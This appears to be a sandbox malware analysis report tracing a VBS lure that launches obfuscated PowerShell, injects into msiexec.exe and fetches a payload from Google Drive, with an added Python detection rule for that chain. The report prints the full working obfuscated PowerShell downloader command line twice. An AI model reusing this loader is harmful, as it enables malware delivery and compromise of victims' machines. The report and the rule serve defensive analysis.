| SHA256 | 11afe6c52f7a904b67ba53610b57fa82e585f432eb9e9d1631310661242d75c0 |
| SHA512 | 34e15da584c5105daf9d4b4f241fcc8439a1a2bcaba3625aa6fd2ec0f1b9d70335825e1e4b133d2ed53cd1594be0a7a031799b8fc29409a32a60b83f61f3ef01 |
memory/2972-19-0x00000000065E0000-0x000000000B7C9000-memory.dmp
memory/1856-20-0x00000000004D0000-0x0000000001532000-memory.dmp
memory/1856-42-0x00000000004D0000-0x0000000001532000-memory.dmp
memory/1856-43-0x00000000004D0000-0x0000000000518000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-23 14:46
Reported
2024-10-23 14:48
Platform
win10v2004-20241007-en
Max time kernel
135s
Max time network
149s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3756129449-3121373848-4276368241-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Network Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\msiexec.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5072 wrote to memory of 2004 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5072 wrote to memory of 2004 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 5100 wrote to memory of 1676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 5100 wrote to memory of 1676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 5100 wrote to memory of 1676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 5100 wrote to memory of 1676 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\SysWOW64\msiexec.exe |
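The WriteProcessMemory rows above, read together with the rest of this run, give the chain a detection engineer wants to key on: WScript.exe (PID 5072) starts the 64-bit powershell.exe (PID 2004), a 32-bit powershell.exe (PID 5100) writes four times into a SysWOW64 msiexec.exe (PID 1676) that was launched with no arguments, and that msiexec.exe then makes the network requests and hides its threads from debuggers. The parent writing into the child it just created (5072 into 2004) is ordinary process start-up and must not fire. The rule below is an added example of that logic, not the sandbox's own signature engine; the event records are constructed to mirror the rows on this page (the parent link for PID 5100 is an assumption, the report does not state it), and the field and function names are mine.

```python
"""Flag the script host -> PowerShell -> hollowed msiexec.exe chain seen in behavioral2.

Added example; not the sandbox's detection logic. Records below are constructed
from the report's rows; PID 5100's parent is assumed (not stated in the report).
"""
from dataclasses import dataclass, field
from typing import Optional


@dataclass(frozen=True)
class Proc:
    pid: int
    image: str
    cmdline: str
    parent: Optional[int] = None


@dataclass(frozen=True)
class Event:
    kind: str                    # "write_memory" | "network" | "hide_thread"
    pid: int
    target: Optional[int] = None  # write_memory only


@dataclass
class Finding:
    source_pid: int
    target_pid: int
    tags: set = field(default_factory=set)


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe"}
# Signed host the sample hollows; extend from your own telemetry.
HOLLOW_TARGETS = {"msiexec.exe"}


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def has_arguments(cmdline: str) -> bool:
    """True when anything follows the (possibly quoted) executable path."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        rest = s[end + 1:] if end != -1 else ""
    else:
        rest = s.split(" ", 1)[1] if " " in s else ""
    return rest.strip() != ""


def ancestry(pid: int, by_pid: dict) -> list:
    """Image basenames of pid's ancestors, nearest first (cycle-safe)."""
    out, seen, cur = [], set(), by_pid.get(pid)
    while cur and cur.parent is not None and cur.parent not in seen:
        seen.add(cur.parent)
        cur = by_pid.get(cur.parent)
        if cur:
            out.append(basename(cur.image))
    return out


def find_injection_chains(procs, events) -> list:
    by_pid = {p.pid: p for p in procs}
    net_pids = {e.pid for e in events if e.kind == "network"}
    hidden = {e.pid for e in events if e.kind == "hide_thread"}
    # One row per WriteProcessMemory call in the report; collapse duplicates.
    writes = {(e.pid, e.target) for e in events if e.kind == "write_memory"}
    findings = []
    for src_pid, dst_pid in sorted(writes):
        src, dst = by_pid.get(src_pid), by_pid.get(dst_pid)
        if src is None or dst is None:
            continue
        # A parent writing into its freshly created child is normal start-up;
        # the signal is an interpreter writing into a signed host that was
        # started with nothing to do.
        if basename(src.image) not in INTERPRETERS or basename(dst.image) not in HOLLOW_TARGETS:
            continue
        if has_arguments(dst.cmdline):
            continue
        f = Finding(src_pid, dst_pid, {"bare_lolbin_target"})
        if dst_pid in net_pids:
            f.tags.add("network_from_target")
        if dst_pid in hidden:
            f.tags.add("hide_from_debugger")
        if any(a in SCRIPT_HOSTS for a in ancestry(src_pid, by_pid)):
            f.tags.add("script_host_ancestry")
        findings.append(f)
    return findings


# Constructed from the behavioral2 rows above (command lines abbreviated with "...").
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
MSI = r"C:\Windows\SysWOW64\msiexec.exe"
PROCS = [
    Proc(5072, r"C:\Windows\System32\WScript.exe",
         r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"'),
    Proc(2004, PS64, f'"{PS64}" " <#Gulvtppes ... #>;..."', parent=5072),
    Proc(5100, PS32, f'"{PS32}" " <#Gulvtppes ... #>;..."', parent=2004),  # parent assumed
    Proc(1676, MSI, f'"{MSI}"', parent=5100),
]
EVENTS = [
    Event("write_memory", 5072, 2004), Event("write_memory", 5072, 2004),
    *[Event("write_memory", 5100, 1676) for _ in range(4)],
    Event("network", 2004), Event("network", 2004),
    *[Event("network", 1676) for _ in range(5)],
    Event("hide_thread", 5100), Event("hide_thread", 1676),
]

if __name__ == "__main__":
    for f in find_injection_chains(PROCS, EVENTS):
        print(f"PID {f.source_pid} -> PID {f.target_pid}: {sorted(f.tags)}")
```

On the constructed events this yields one finding, 5100 into 1676, carrying all four tags, while the WScript.exe write into its own child is ignored. The behavioral1 run lists no rows under its WriteProcessMemory signature, so there a rule like this has to lean on the remaining tags (bare msiexec.exe making network requests, NtCreateThreadEx/NtSetInformationThread hide-from-debugger) rather than on the write itself.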
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação-24100004_lista comercial.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: 
FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V 
oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . 
Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Gulvtppes adelskrones Saligprisningerne Issens #>;$Conversance='Trecifrede';<#Rungs Spongian Thinglikeness Festonerne Mix #>;$Omnilingual=$Unbrotherliness112+$host.UI; function Pummice($Additionstegnene){If ($Omnilingual) {$Rabbit185++;}$Pusses=$Oprydningsarbejdencumberment+$Additionstegnene.'Length'-$Rabbit185; for( $Oprydningsarbejde=5;$Oprydningsarbejde -lt $Pusses;$Oprydningsarbejde+=6){$moradserne=$Oprydningsarbejde;$Reders+=$Additionstegnene[$Oprydningsarbejde];$Sneugle='universitetsstillingens';}$Reders;}function Tvanglst($Paniclike){ . ($Blokdiagrams) ($Paniclike);}$dokumentnavnet=Pummice 'trimmMSulpho Br.ezPrismiStalil T.knlKnothaSturd/ Coh ';$dokumentnavnet+=Pummice 'Ens.a5Erant.Organ0Eso.h Forha(OrganWAntiniVe nanUnwagdFordloTestaw nopss Figu KartoNNut dT Rham filmi1Parla0Comed.Aviru0Tilbj; Skab WaitiW Terpi,xplon ,dvi6 Sab 4Miner; Velu HillxUnder6Storr4U ind; Al h Di trDeempvSneez: oloc1 Bega3Tvill1No.na.Kunde0Dispu)delmo SelvoGDiskoeOlenbc.hyrokIn teoCofer/inher2osmid0Prece1indl,0 Doro0B bel1Retin0Villa1Murde H emaFToupei tikkrHngepeisthmfTomfoo SenaxStand/,rans1S.ovl3M nom1Squel.Fuldb0skarn ';$Adenomycosis=Pummice 'InferUho.edSD.ngdETuberRPanin-isin aAnatog A.oxENonhyNTryghTOlg m ';$Udgivelsesdags=Pummice 'UnexahUnrintSamsvt ArmapremtrsResys: Graa/Under/hovedd onlarSul.iiJord v isyoeLager.PloddgBr.msoS irioManomg Wun,lDiphteBorge.NondecInsoloSpaewmUnph /ArbejuFedercAngka?Gymnae P epxafvispRestsoLedelrEntertMenne=S.ppodSpecio lmemwRum snFarlilMonito AbstaGrim,dSpejl& LivsiDoms d ipie= elvt1SifflT PalaWReakts atal7Blast0Femte2 Ha.vsStamp0Totall DataVDec a2StedsuMa,kipAns,amStr fHPhonor D miuServi5BespepWarszBB urrQRecepPC ikagUdbe vD,ssy2La riIKlaveuOratoV,ksgrW RummAAfrydmKogeri Nost ';$Promulges=Pummice ' Kont>Tunge ';$Blokdiagrams=Pummice 'Fila ISamfueR.gimXEncep ';$Slikne='netherlands';$Uraturia='\Symbolerne.rab';Tvanglst (Pummice 'Forpl$ PalpgBrioclBilfao Be jbKrockAVe omL Welt: 
FedtFAkromRIndigA.rousFNominlF letYCo cet AarpnUreteiFrasiNAlveog CeneeOprrsRFatal=Turfs$Boar eH,poiNPensiV N.tt:NrkleaSveskpHektapansgndFlersa ScatT mooAOut.a+Ander$Indflu Woddr.tabbaFordetDecliuWork RKata IElev,ARegai ');Tvanglst (Pummice ' Ding$StandGFormul ektooRettibplanta FredlLandb: urbeTGasmaiIwortlRen,eFT.ldrl TranU RumfgH,emmtPolybs AdmoS forttSkyndEFeticd.ypegSUnsal= Lyds$MarkeUInfird Sli.GImmuniCoojaVGeorgeEqu,sLRri tsunb hEAfsgtsHughldSup raMohu gt rivs Sagu.UdlanSUidenpvejerLIl oriSbefaTbemgt(Hiero$SpidsPAfsenRGendrOuniteMAlt.rUFor aLDechlGReburE SoveS S pe)Stick ');Tvanglst (Pummice ' Onto[ ositnDyrtiESm latOutle.PerfoSPlaceeHo.jgRNa.urV R ttiIdeolcLin,eeFraskP CaucOSammeI LifeNtank,t Crafm.ommeAHoneyNskat.A hotoGFlop,E SmaaRAntim]Afsbn:Nonpr:KabbasCalleEKrigsCVveneuDelstRdanskI EconT AmbrYUn,mppTacsoRUnforo lasst sandoInterCR diooDuntsl algs Auxi=Myolo Crewe[stemnNDiploeM,neyTNonde.HasteSIdrtse elleCEvaluUArbejrV entIK talTA falySkraap,ankfRRee.iOsatirT stifoApolac N nroOpfrilhjmodT.ogklY Kn,upKaa.eeSt kr],ljen:Parac:intintV.lbeLDicemSMetas1Aktiv2Lbehj ');$Udgivelsesdags=$Tilflugtssteds[0];$Giftstof=(Pummice 'L,nds$aer dG jenLsovjeOPipewbalexiaNord.LCrown: Sem ROecu E TykkKTryllO GulvrTribuDDobbeD UnfaAUforsGUdvikETapha=Ske nnFnokueInterwPolyp-AksonOTopeeBBigbajPresseFaktucTitmetSidde SlufsLavsoYFor,tS TrsnT U loeNeba,Munco..Dors nTr llE HogrTRavel.LongsWJudgeEOmbribSeptuCS,ldalamidaiEntanEHy otn GestT Pers ');Tvanglst ($Giftstof);Tvanglst (Pummice 'Aabn.$Spe,gRSles eMag.ok RagtoUng rrHovedd.veredOevelari gegMicheeConge.HosemHBwanaeChalaa atald RudeepromirCoiffs casu[Falci$ VkstATjenedNyd le BagmnSka aoStramm.orstyA tiocSten oModelsQuen iD ffes kewl]Whit,=Hove $Fro od BlomoBilinkBa gauSatsfmKegleeSkr dn Hrznt ttefn T,ouaNonhovBedotn AbereTrf,etSsona ');$Blindfoldedly=Pummice 'vadeh$Sk,zoR CitrePensikChu ro OverrE cumdEkstedReproaGenisgSandeeUnsta.C.tabDDeseroAra kwVaab,nDds,il KursoSpheraTilladGoverFTransi atenlstrabeUnq a(V 
oli$S.affUMaanedPorthg.erviiPuzzlvStri eInfralTeknis egleFlg,ss nsfdLussiaStormgNaadesViv s,craft$bedreAUnplam Ei ei.onset MunsrPrai oPumpilDrvt eAntib)Iso o ';$Amitrole=$Fraflytninger;Tvanglst (Pummice 'inte $act vgrikkel F rgoPseudBFenchARaserlFlere:folkeiNutatNSociet Und,e Skv,RUnderiReggeoEnaarNFliddI ragecJ zzi=Lse,a( omprtBronzEStenus Le,etAfhor- Restp HaraaForbrt A behTa ul ,utot$ BevgA Kolom dvanISuperT FyrarMdreno.romoL planeUncon)Execu ');while (!$interionic) {Tvanglst (Pummice 'Umaad$ba ekgTrykklSalgsoMikkabNonwoaSheril Hosi:PuppyPArve.pSkifflTjene=Fodba$DatastanarkrSikkeuUnimpeM ljf ') ;Tvanglst $Blindfoldedly;Tvanglst (Pummice 'AntimsLorent nsolAPopulrcyclitLangu-FerdySFiskelUl.raEO ernemandiPSteno Bygge4Slnge ');Tvanglst (Pummice ' ngdo$ UntugTsoreLKnopuOBeskuBF ilgA outbl Brsm:antaeITerroNBg.sktKonsuedrivmrPha.lIAth,eO LensN Ov,riS.ardC O tt=Draab(Unva,TKaukaeZipevsTrekltUnpro- DemoPOps.iA Verit iddeh Unit Forci$SnorrADesigm Pre.ITyrant ComprAeri OArreslMasseeTilke) Junc ') ;Tvanglst (Pummice 'Co se$Kvadrg Bac LUntraoUn ndbAnmela S del Angi:NiggaSTavleiNoninMSaliep edlelUnvehi FagmcbyranEMikass Wumm= Afsk$Kal.mG.ilbaLS,perOLysrebSeismA Hug lRackm: Uda Asalatn Tovel SymmB amlN InkoIHulslNs ring onvuE MennNDemo,s Part+ Cona+Tyref%repre$HedniTOra lI ammeLinterfKartoLH,tteuFrem GSlutrt Hov sAbiossSluddTOffeneSpaliD K nesNe.tr.R liqcRibboOStomaUOffloN,lavitUd kr ') ;$Udgivelsesdags=$Tilflugtssteds[$Simplices];}$Podzolic=313753;$Maidenhood=30049;Tvanglst (Pummice 'Ether$ .elegKlvesl raveO Fo kb Sleya LandlCruth:PreindDmrinICampeo PrecICheriC,krivOUnderuAlb msHora LMoistyTryma Melle=Unspe MetasGNonamE.oucatPolde-SkandcSkilro rysn,easutCor,ieAfrydnKaja.T Pane Jaste$KimbeAHybenmAcrazi unitOliemrLam nOD scolUteroegauds ');Tvanglst (Pummice ' orru$E,keng Mut,lArgumoAggelbHydraa Linnl eury:TricoD SupeeFagsnnDovetaTrappt ideliPostaoLaconn SparaSnowslNonfaiCommesRetroe Poly Slikk=Tring Strud[SnakkSFedthyUnmersNum itIncoreSat,lmVrdi . 
Utr.C.odbro.ongwnB.stivNonhyeB llorKodeot ysiu]ottea: Ko n: afgnFDisporLukreo CalmmanaglBAakirasubansPentie Vina6 Stil4 da.sS CopatSemisr Nyspi Jot.nForudgSlagf(Inkli$ A.owDSanggiSmkfoo.ordsiVandkcEndosoSteerugunjss arnelPolyuyOdome) eter ');Tvanglst (Pummice ' Prov$ PneuG OestlClippOLand,bBre naSkrivl hioa:Otolor lcohE rawS kninT udb sBarfokSpatiASe,ektCo fet AfbaEFirkaR ,dskNForbieblank horm =Tauri Acc.m[RehanSHstruyMangesEnseaTkli aeB ckemBlndd.A.imatSkumsetraurXTiaart Bec .InsulEOvertn,rkitcPothooCachiDEksp.iUbeslNB okeGSemin]Unif,:pille:fravra roads.ukasc ConfIOnaniI Exig.TrskeG Ossie OvertDiplosUnearTChaldRAnforIFuldkNSkubbGAlges( ofi$ ejenDP,emieGarliNAfbraA N,noTDrejeIRiddeOParfuN MageaUnciaLselvbiMo als.rgerEAmphi)Expat ');Tvanglst (Pummice ' nmob$ Cas GPicniLReaffo krisbVelmaAFilosl M.no:UnderfStandOfenniTDiagnoRequ tImp rE udcK nchaeSovemr SeresScop,=Flaci$BloopR aerteSandbsup tatDy elS HypoKHabitaVrelsTImplitUnleaEForldrVaconnErgonE Udsn.SoergSInte,UKernebLaengsMatteTU joir.roniiRose nanapng repa(Count$HydropDechio Ran,dLobelZDvst.oTidssLRetiniBrattcWayfa,Undou$ .xpeMDuopoAClypeiCorrodSvedjE.ftviNHj neHSelskOImproo AfspdSanbe)Cir u ');Tvanglst $Fototekers;"
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\SysWOW64\msiexec.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 1676 -ip 1676
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1676 -s 1628
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
